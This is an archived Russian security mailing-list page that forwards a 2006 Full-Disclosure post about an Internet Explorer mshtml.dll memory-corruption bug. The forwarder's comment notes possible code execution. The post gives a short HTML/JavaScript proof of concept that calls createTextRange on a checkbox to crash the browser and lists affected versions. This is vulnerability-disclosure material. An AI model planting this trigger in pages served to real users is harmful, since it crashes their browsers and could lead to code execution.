ПРОЕКТЫ 

  АРХИВ 

Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 

  ПЕРСОНАЛЬНОЕ 

  ПРОГРАММЫ 

ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] Fwd: [Full-disclosure] IE crash

Потенциально  -  выполнение кода. Но вряд ли можно сделать его полностью
рабочим, только с некой вероятностью.

--This is a forwarded message
From: Stelian Ene <stelian.ene@xxxxxxxxxxxxx>
To: full-disclosure@xxxxxxxxxxxxxxxxx <full-disclosure@xxxxxxxxxxxxxxxxx>
Date: Wednesday, March 22, 2006, 12:13:27 PM
Subject: [Full-disclosure] IE crash

===8<==============Original message text===============
I can't find any info on this delicious IE bug, but it seems to be publicly 
known:

<input type="checkbox" id='c'>
<script>
        r=document.getElementById("c");
        a=r.createTextRange();
</script>

It will badly access a (virtual?) pointer table, making EIP to jump at a random
address. This has various effects on the system I've tested with, including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

===8<===========End of original message text===========


-- 
~/ZARAZA
http://www.security.nnov.ru

 



Copyright © Lexa Software, 1996-2009.